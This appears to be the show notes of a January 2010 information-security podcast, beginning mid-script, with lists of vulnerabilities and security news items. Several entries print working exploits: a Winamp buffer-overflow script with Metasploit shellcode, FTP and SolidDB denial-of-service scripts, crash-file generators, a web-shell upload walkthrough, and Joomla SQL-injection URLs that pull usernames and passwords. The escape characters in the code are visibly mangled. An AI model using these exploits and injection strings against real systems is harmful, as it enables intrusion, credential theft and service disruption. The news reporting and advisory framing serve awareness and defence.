print “n”;
print ” Wait Till The Buffer is Donen”;
my $b1 = “x41″ x 100000000;
print “n”;
print ” DoS is UP !.. N Give it a Second n”;

$DoS=IO::Socket::INET->new(“$ip:$port”) or die;

print $DoS “stor $b1n”;
print $DoS “QUITn”;

close $DoS;

# exit :

1. The login page of the F2L-3000 version 4.0.0 is vulnerable to SQL Injection. Exploitation of the vulnerability may allow attackers to bypass
   authentication and access sensitive information stored on the device.  A patch is not available at this time. Possible workarounds include
   disabling the vulnerable service, or limiting access to a set of trusted IP addresses.
2. Winamp version 5.572 is subject to local buffer overflow.  Exploit code is available:

#!/usr/bin/perl

# Still learning, having some fun…
# Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki
# Special greetz do Debug, even i dont know you. Nice find man.
# Exploit has something around 70% chance of success.

print “n#########################################n”;
print “# Winamp 5.572 stack buffer overflow #n”;
print “# PoC by: Debug (eldadru@gmail.com) #n”;
print “# Exploit by: NeoCortex (ICQ 158005940) #n”;
print “#########################################n”;

print ” __ __________________n”;
print ” ________ / \ / / ____ / ____ /
________n”;
print ” ________ /_______/ / /\ \ / / /___/ / / / / /_______/
________ n”;
print ” /_______/ _______ / / \ \ / / /_____/ / / / ________
/_______/n”;
print ” /_______/ / / \ \/ / /_____/ /___/ /
/_______/n”;
print ” /_/ \__/_______/_______/n”;
print ” Where’s the next phone box to the matrix
please?nnn”;

my $version = “Winamp 5.572″;

my $junk = “x41″ x 540;
my $eip = “xadx86x0ex07″; # overwrite EIP – 070E86AD FFD4 CALL
ESP nde.dll
my $nop = “x90″ x 100;

my $shellcode =
# payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
“xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49″.
“x49x49x49x49x49x49x49x49x49x49x49x51x48x5ax6ax47″.
“x58x30x42x31x50x42x41x6bx42x41x57x42x32x42x41x32″.
“x41x41x30x41x41x58x50x38x42x42x75x78x69x6bx4cx6a”.
“x48x53x74x67x70x67x70x75x50x4ex6bx53x75x65x6cx6e”.
“x6bx51x6cx46x65x70x78x43x31x68x6fx4ex6bx30x4fx54″.
“x58x6ex6bx73x6fx57x50x67x71x58x6bx77x39x4cx4bx64″.
“x74x6cx4bx57x71x5ax4ex76x51x49x50x6ex79x6ex4cx4f”.
“x74x4bx70x70x74x37x77x69x51x48x4ax64x4dx43x31x4f”.
“x32x7ax4bx48x74x55x6bx72x74x34x64x77x74x70x75x4d”.
“x35x6cx4bx71x4fx75x74x36x61x48x6bx41x76x4cx4bx44″.
“x4cx70x4bx4ex6bx63x6fx55x4cx33x31x68x6bx4ex6bx35″.
“x4cx4ex6bx34x41x6ax4bx6cx49x33x6cx35x74x64x44x4a”.
“x63x34x71x4bx70x63x54x6ex6bx71x50x76x50x4fx75x4b”.
“x70x72x58x74x4cx4cx4bx77x30x76x6cx4cx4bx44x30x57″.
“x6cx6cx6dx6ex6bx75x38x54x48x58x6bx73x39x6ex6bx4b”.
“x30x4ex50x37x70x67x70x37x70x6cx4bx62x48x45x6cx63″.
“x6fx35x61x39x66x35x30x50x56x4dx59x48x78x6ex63x59″.
“x50x43x4bx66x30x43x58x68x70x6fx7ax43x34x33x6fx73″.
“x58x4fx68x6bx4ex6dx5ax46x6ex72x77x6bx4fx78x67x63″.
“x53x62x41x30x6cx55x33x64x6ex42x45x70x78x32x45x33″.
“x30x47″;

open (myfile,’>> whatsnew.txt’);
print myfile $version.$junk.$eip.$nop.$shellcode;

print “[+] whatsnew.txt written.n”;
print “[ ] Now copy it to your winamp folder…n”;
print “[ ] Run winamp and hit [About Winamp]->[Version
History]n”;

4.      BoastMachine version 3.1 is subject to a remote shell upload vulnerability.
·        First join in the Site /Server/path/register.php

• Login in the Site/Server/path/login.php
• After login, go to /Server/path/bmc/files.php?form_id=new
• Now upload your shell like ( Shell.php.rar ) and you will find your shell here /Server/path/files/username_Shell.php.rar
• http://sample.com/hp_boastMachine/files/username_Shell.php.rar

5.  Safari version 4.0.4 is subject to a javascript crash denial of service vulnerability.  The following piece of javascript will crash Safari nicely when triggered using one of the methods described below. PoC code is available:
<script>
var data = “A”;
while(data.length<0×40000){
data += data;
}
data2 = new Array();
for (x=0; x<4000; x++){
data2[x] = data+data;
}
</script>

News Items of Interest:

News item 1:http://www.benedelman.org/news/012610-1.html
Do you run Google’s Toolbar? Did you disable the transmitting to Google of the full URL of every page-view, including searches at competing search engines. Apparently, even if a users wants to disable such a transmission it’s fairly easy to turn them off, right?  You might be surprised to learn that apparently disable means don’t disable when you’re using “Enhanced Features” mode.

Which by the way, the standard Google Toolbar installation encourages users to activate via a “bubble” message shown at the conclusion of installation.  The bubble presents a forceful request for users to activate Sidewiki: Which is described as “enhanced” and “helpful”, and Google chooses to tout it with a prominence that indicates Google views the feature as important. Moreover, the accept button features bold type plus a jumbo size (more than twice as large as the button to decline). And the accept button has the focus – so merely pressing Space or Enter (easy to do accidentally) serves to activate Enhanced Features without any further confirmation

News item 2:  http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3211151
Hacker best known for cracking Apple’s iPhone says he’s done it again, this time with Sony’s PlayStation 3. In a blog post, George Hotz said that after a five-week effort, he’d finally managed to run his own software on the PlayStation 3, which typically only plays digitally signed software that is approved by Sony. “I have read/write access to the entire system memory, and [hypervisor] level access to the processor,” he wrote. “In other words, I have hacked the PS3.”  He pulled off the feat using “very simple hardware, cleverly applied, and some not so simple software,” he added.

News item 3: http://news.cnet.com/8301-1009_3-10442305-83.html?part=rss&subj=news&tag=2547-1_3-0-20

The “Verified by Visa” credit-card authentication system has come under criticism from Cambridge University researchers, who say it is training online shoppers to adopt risky security habits.

The feature, which is used to authenticate online financial transactions, confuses people by not displaying security cues, security engineering researchers Ross Anderson and Steven Murdoch said in a paper (PDF) published Tuesday.

The primary purpose of 3DS is to allow a merchant to establish whether a customer controls a particular card number. It is essentially a single-sign on system, operated by Visa and MasterCard, and it diers in two main ways from existing schemes such as OpenID or InfoCard.

3D Secure is an XML-based protocol used as an added layer of security for online credit and debit card transactions. It was developed by Visa to improve the security of Internet payments and offered to customers as the Verified by Visa service. Services based on the protocol have also been adopted by MasterCard, under the name MasterCard SecureCode, and by JCB International as J/Secure.

3-D Secure adds another authentication step for online payments. Merchants are encouraged to use 3-D Secure to achieve higher coverage against fraud losses. When a merchant does not use 3-D Secure they are liable for fraudulent transactions even if the transaction was properly authorized.  3-D Secure should not be confused with the Card Security Code which is a short numeric code that is printed on the card.

Before 3DS can be used to authenticate transactions, cardholders must register a password with their bank. A reasonably secure method would be to send a password to the customer’s registered address, but to save money the typical bank merely solicits a password online the 1st time the customer shops online with a 3DS enabled card { known as activation during shopping (ADS).

News item 4:http://www.computerworld.com/s/article/9149218/Bank_sues_victim_of_800_000_cybertheft?
A Texas bank is suing a customer hit by an $800,000 cybertheft incident in a case that could test the extent to which customers should be held responsible for protecting their online accounts from compromises.  In November, unknown attackers based in Romania and Italy initiated a series of unauthorized wire transfers from Hillary’s bank accounts and depleted it by $801,495. About $600,000 of the amount was later recovered by PlainsCapital. Hillary demanded that the bank repay it the rest of the stolen money. In a letter to the bank in December, Hillary claimed that the theft happened only because PlainsCapital had failed to implement adequate security measures. The bank sought to absolve itself from blame in the heist by stating that the unauthorized wire transfer orders had been placed by someone using valid Internet banking credentials belonging to Hillary Machinery. “PlainsCapital accepted the wire transfer orders in good faith,” and had therefore not breached any of its agreements with Hillary, the bank said in its complaint.

The case is also unusual because it is believed to be the first bank to launch a pre-emptive lawsuit against a customer victimized by a cyber theft. Several other cases, where companies that have been victims of such thefts have sued their banks for failing to implement reasonable security measures, are pending in courts around the country.

Hillary is still deciding its next steps, but according to its lawyer, Patrick Madden, the company will next file a response asserting that it was the bank’s failure to employ suitable security controls that resulted in the theft.
News item 5: http://www.omaha.com/article/20100126/NEWS97/701269885
Federal prosecutors in California say a Nebraska man will plead guilty to participating in a cyber attack on Church of Scientology Web sites in January 2008.

Brian Thomas Mettenbrink agreed to plead guilty Monday to the misdemeanor charge of unauthorized access of a protected computer, said Thom Mrozek, a spokesman for the U.S. attorney’s office in Los Angeles. Mettenbrink faces a year in federal prison.

Court records say Mettenbrink attacked Scientology Web sites as part of Anonymous, an underground group that protests the Church of Scientology, accusing it of Internet censorship.

Prosecutors say hackers conducted a “denial of service” attack, in which computers flood a target Web site with malicious Internet traffic, making it unavailable to legitimate users.

News item 6: http://news.techworld.com/security/3211146/researcher-reveals-another-ie-security-flaw/?olo=rss

A flaw in Microsoft’s Internet Explorer could allow a hacker to read files on a person’s computer, according to a security researcher. The claim represents another problem for the company just days after a serious vulnerability received an emergency patch. The problem was actually discovered as long as two years ago but has persisted despite two attempts by Microsoft to fix it, said Jorge Luis Alvarez Medina, a security consultant with Core Security Technologies. He is scheduled to give a presentation at Washington’s Black Hat conference on 3 February.

News item 7: http://blog.commandlinekungfu.com/

FORENSICS 606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

1. The JBDiary component for Joomla! is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URLs:http://www.sample.com/?newyear=2011′+and+substring(@@version,1,1)=4%23&amp;newmonth=01

   http://www.sample.com/?newyear=2011′+and+substring(@@version,1,1)=5%23&newmonth=01

   http://www.sample.com/?newyear=2011&newmonth=01′+and+substring(@@version,1,1)=4%23

   http://www.sample.com/?newyear=2011&newmonth=01′+and+substring(@@version,1,1)=5%23

2. IBM SolidDB is subject to a remote denial-of-service vulnerability. An attacker may leverage this issue to crash the affected application, denying service to affected users. This issue affects SolidDB 6.30.0.29 and 6.30.0.33; other versions may also be affected.  Exploit code is available:
   #!python
   import socket
   import struct

   #maxlen 0xA
   a = struct.pack(‘<b’, 2)
   a += struct.pack(‘<H’, 0)
   a += struct.pack(‘<H’,0xFEFF)
   a += struct.pack(‘<H’,0xFEFF)
   a += “1234″

   target_ip = ‘X.X.X.X’

   s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
   s.connect ((target_ip, 2315))

   s.send(a)
   s.close()

3. Google Chrome is subject to multiple vulnerabilities including multiple memory-corruption issues, multiple security-bypass issues, input-validation issues and denial-of-service issues. Attackers can exploit these issues to bypass certain security checks, execute arbitrary code in the context of the browser, and cause denial-of-service conditions; other attacks are also possible. Versions prior to Chrome 4.0.249.78 are vulnerable. Attackers can use standard tools to exploit some of the issues; other issues may require exploit code.
4. Adobe Reader and Acrobat are subject to a remote security-bypass vulnerability.An attacker can exploit this issue to obtain the contents of sensitive PDF files or to perform cross-site scripting attacks against domains hosting PDF files. Example PDF:
   %FDF-1.2
   1 0 obj
   <<
   /FDF
   <<
   /F(http://www.sample.com/any.pdf)
   /JavaScript
   <<
   /After (app.alert(“Executing script inside Acrobat at “+URL);)
   >>
   >>
   >>
   endobj
   trailer
   <</Root 1 0 R>>

News Items of Interest:

News item 1:http://www.theregister.co.uk/2010/01/25/oil_companies_attacked/

At least three US oil companies were victims of highly targeted, email-borne attacks designed to siphon valuable data from their corporate networks and send it abroad, according to a published report citing unnamed people and government documents.

The attacks against Marathon Oil, ExxonMobil, and ConocoPhillips began with emails sent to senior executives that included links to booby-trapped websites, according to the report in The Christian Science Monitor. The breaches focused on the companies’ proprietary “bid data” detailing the quantity, value, and location of petroleum discoveries worldwide. The report said at least some of the attacks appeared to originate in China, but didn’t provide proof beyond the existence of servers located in that country used to store some of the stolen data.

News item 2:http://www.dailymail.co.uk/news/article-1245622/For-sale-Personal-details-millions-Ladbrokes-gamblers.html

The confidential records of millions of British gamblers who bet with top bookmaker Ladbrokes have been offered for sale to The Mail on Sunday.

The huge data theft is now at the center of a criminal investigation after this newspaper was given the personal information of 10,000 Ladbrokes customers and offered access to its database of 4.5 million people in the UK and abroad.  The records include customers’ home addresses, details of their gambling history, customer account numbers, dates of birth, phone numbers and email addresses.

News item 3: http://www.lasvegassun.com/news/2010/jan/25/umc-patient-info-leaks-likely-date-back-july/
For more than three months someone at University Medical Center illegally leaked the personal information of traffic accident victims — a breach of social security numbers, birth dates and more that only stopped when the Las Vegas Sun contacted the hospital about it, according to a statement released today by UMC.

News item 4: http://news.cnet.com/8301-27080_3-10441004-245.html

People behind the China-based online attacks of Google and other companies looked up key employees on social networks and contacted them pretending to be their friends to get the workers to click on links leading to malware, according to a published report on Monday.  “The most significant discovery is that the attackers had selected employees at the companies with access to proprietary data, then learnt who their friends were,” the Financial Times reported. “The hackers compromised the social network accounts of those friends, hoping to enhance the probability that their final targets would click on the links they sent.”
News item 5: http://blog.osvdb.org/2010/01/24/microsoft-aurora-and-something-about-forest-and-trees
Why do we care that Microsoft sits on vulnerabilities for six months? Why is that such a big deal? Am I the only one who missed the articles pointing out that they actually sat on five code other execution bugs for much longer?

News item 6: http://www.businesscomputingworld.co.uk/?p=3347

Some additional news out of CES is that Victorinox’s swiss army knife remained uncracked – and that the $100,000 prize went unclaimed.  Even if someone had cracked the 2010 version of the famous Swiss Army knife, they would have obtained a lot more than $100,000 from other sources. Victorinox, the manufacturers of the Swiss Army knife, which dates back to the late 1800s in its various forms, has made much of the unit’s tamper-proof self-destruct mode, but the reality is that the crypto USB drive supports elliptical curve and AES encryption, which makes it almost impervious to crackers using current known technology.
As Schneier observed in his research, cryptography is all about safety margins. If a hacker manages to crack 128-bit AES technology, then you can bet your bottom line that Schneier would be interested, and governments would pay a lot more than $100,000 for the secret. But this clearly isn’t going to happen for some time to come, so I think Victorinox’ cash is safe for the time being.

News item 7:  http://www.wired.com/threatlevel/2010/01/jilsi-pleads-guilty

A former ringleader of a top internet carding site run secretly by the FBI has pleaded guilty in the United Kingdom. Renukanth Subramaniam, aka JiLsi, was a former Pizza Hut delivery guy who helped run one of the leading English-language criminal sites, DarkMarket. The site operated as an international cyber-bazaar for more than 2,000 hackers, carders and identity thieves until it was closed in 2008.

Members of the site traded in stolen bank card and identification data. They bought and sold specialized equipment for skimming card and PIN numbers, and for cloning data to blank cards. The activities on DarkMarket are estimated to have resulted in fraud amounting to tens of millions of dollars.

News item 8:http://news.cnet.com/8301-27080_3-10439263-245.html

The California Department of Motor Vehicles department suffered a network outage on Thursday due to an equipment glitch, a state official said. A router switch malfunctioned, said Bill Maile, spokesman for Office of Technology Services for the state of California. “It’s very rare,” he said. “Our staff quickly diagnosed the problem and re-routed network traffic to restore connectivity.” The network was down for about two hours and was restored at about 1:40 p.m. PST, according to Maile. There are 168 DMV offices throughout the state, said Jan Mendoza, spokeswoman for the DMV. “We didn’t close offices,” she said. “When people came in we handled customers manually. We did it the old-fashioned way–with pen and paper.”
News item 9:http://www.eetimes.com/news/design/showArticle.jhtml?articleID=222301321
The IEEE has launched a new Web site that consolidates information about smart electric grids from it various societies. The portal is one of many activities from an IEEE smart grid initiative coordinating the organization’s work on the transition to digital, networked power systems and services.

The smart grid is “so interdisciplinary,” said Wanda Reder, chair of the IEEE Smart Grid Task Force and former president of the IEEE Power & Energy Society. “We have the gamut covered in technical interests, but we needed a way to facilitate communications between our many entities to link information on all the conferences, papers and standards we have in this area,” she added.

The Web site lists many of the estimated 100 existing IEEE standards related to smart grids. It also includes pointers to the IEEE 2030 group started last year that aims to release a draft guide to smart grid design in early 2011.
News item 10:  http://news.zdnet.co.uk/security/0,1000000189,40005862,00.htm?s_cid=248use hackers are the “noisiest and easiest to detect”,
Many organizations are focused on stopping random hackers and blocking pornography when they should be concerned with bigger threats from professional cybercriminals, according to a new cybersecurity report.

In a survey conducted in 2009 of 523 IT and security managers, top-level executives and law-enforcement personnel, hackers were rated the biggest threat, followed by insiders and foreign entities — probably because hackers are the “noisiest and easiest to detect”, the 2010 CyberSecurity Watch Survey concluded.

InfoSec Podcast Episode 53 for January 25, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

FORENSICS 606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

1. IntelliTamper is subject to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. This issue allows remote attackers to execute arbitrary machine code in the context of the application. Failed exploit attempts will likely crash the application, denying service to legitimate users.  IntelliTamper 2.07 and 2.08 are vulnerable; other versions may also be affected. Proof-of-concept and exploits are available:
   # H0m3 : S3curity-art.com & Google.com
   # M4!L : Wizard-skh@hotmail.com<mailto:Wizard-skh@hotmail.com> & My@hotmail.it<mailto:My@hotmail.it>
   # usage : perl xpl.pl >>xpl.html
   my $IntelliTamper_html =’<html><head><title>SkuLL-HackeR Home
   World</title></head><body>’ .
   ‘<script defer=”‘ .
   “\x41″ x 3076 .
   ‘”>’ .
   “</body></html>”;
   print $IntelliTamper_html;
2. PunBB is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.  An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.  PunBB 1.3 is vulnerable; other versions may also be affected. Google Dork: inurl: viewtopic.php?pid= Example URL: http://www.sample.com/forum/viewtopic.php?pid=[Xss]
3. The ‘com_gameserver’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/component/gameserver/?view=gameserver&amp;grp=-1′+union+all+select+1,concat(username,0x3A,password),3,4,5,6,7+from+jos_users%2
4. The ‘com_gurujibook’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL available: http://www.sample.com/index.php?option=com_gurujibook&amp;task=showPDF&amp;bookid=-32+union+all+select+concat(username,0x3a,password),2,3,4+from+jos_users–
5. The JbPublishDownFp component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/[JOOMLA_PATH]/administrator/index.php?option=com_jbpublishdownfp&amp;task=edit&amp;cid[]=-1+union+all+select+concat(username,0x3A3A3A,password)+from+jos_users
6. The Mochigames component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/[JOOMLA_PATH]/index.php?view=mochigames&amp;id=99999%27+union+select+1,2,username,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users%23&amp;option=com_mochigames&amp;Itemid=80
7. VMware Player is subject to an .m3u skin file local heap overflow.
   # By : Pr0f.SeLLiM
   VMware Player (.m3u Skin File) Local Heap Overflow PoC
   ########################
   ##EBX 41414141
   ##ESP 0012EF6C
   ##EBP 00DA50F8 ASCII “C:Program FilesVMware
   Playerskinscrash.M3u”
   ##ESI 0012EFD8
   ##EDI 014143F8
   ##EIP 7C90EAF0 ntdll.7C90EAF0
   #############################################################
   my $boom=”x41″ x 5000;
   my $file=”crash.dat”;
   open($FILE,”>$file”);
   print $FILE $boom;
   close($FILE);
   print “File Successfully Createdn”;
   #####

News Items of Interest:

News item 1: http://news.bbc.co.uk/2/hi/americas/8478005.stm

A Chinese industry ministry spokesman told the state-run Xinhua news agency that claims that Beijing was behind recent cyber attacks were “groundless”. US Secretary of State Hillary Clinton this week asked China to investigate claims by Google that it had been targeted by China-based hackers.The US search giant has threatened to withdraw from China. “The accusation that the Chinese government participated in [any] cyber attack, either in an explicit or inexplicit way, is groundless. We [are] firmly opposed to that,” the unnamed spokesman of China’s ministry of industry and information technology told Xinhua.

News item 2: http://pajamasmedia.com/instapundit/92423/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+instapundit%2Fmain+%28Instapundit%29

“In order to comply with government search warrants on user data, Google created a backdoor access system into Gmail accounts. This feature is what the Chinese hackers exploited to gain access. Google’s system isn’t unique. Democratic governments around the world — in Sweden, Canada and the UK, for example — are rushing to pass laws giving their police new powers of Internet surveillance, in many cases requiring communications system providers to redesign products and services they sell.”

News item 3: http://seclists.org/fulldisclosure/2010/Jan/474

From: Orn Roswell <orn.roswell () gmail com>
Date: Sun, 24 Jan 2010 23:52:27 +0100
Hello,

I am selling IE 8 remote code execution exploit (not patched by the last Microsoft fix). Working under Windows Vista & Windows 7.

Regards,

[ORN ROSWELL]

News item 4: http://www.computerworld.com/s/article/9148138/Researcher_to_reveal_more_Internet_Explorer_problems
Microsoft’s Internet Explorer (IE) could inadvertently allow a hacker to read files on a person’s computer, another problem for the company just days after a serious vulnerability received an emergency patch.

The problem was actually discovered as long as two years ago but has persisted despite two attempts by Microsoft to fix it, said Jorge Luis Alvarez Medina, a security consultant with Core Security Technologies. He is scheduled to give a presentation at the Black Hat conference in Washington, D.C., on Feb. 3.

News item 5: http://news.cnet.com/8301-13772_3-10440819-52.html?part=rss&subj=news&tag=2547-1_3-0-20

Earlier this month, as reported by AVWeb, the U.S. Federal Aviation Administration issued “special conditions” regarding Boeing’s forthcoming 747-8–the next-generation of its iconic 747 line of planes–aimed at making sure that the new plane’s high-tech networking systems are hack proof.

According to the FAA, the 747-8–which should have its first flight any day now, and which is intended to be a much more efficient and powerful version of the 747 than even its most recent models–”will have novel or unusual design features associated with the architecture and connectivity capabilities of the airplane’s computer systems and networks, which may allow access to external computer systems and networks.”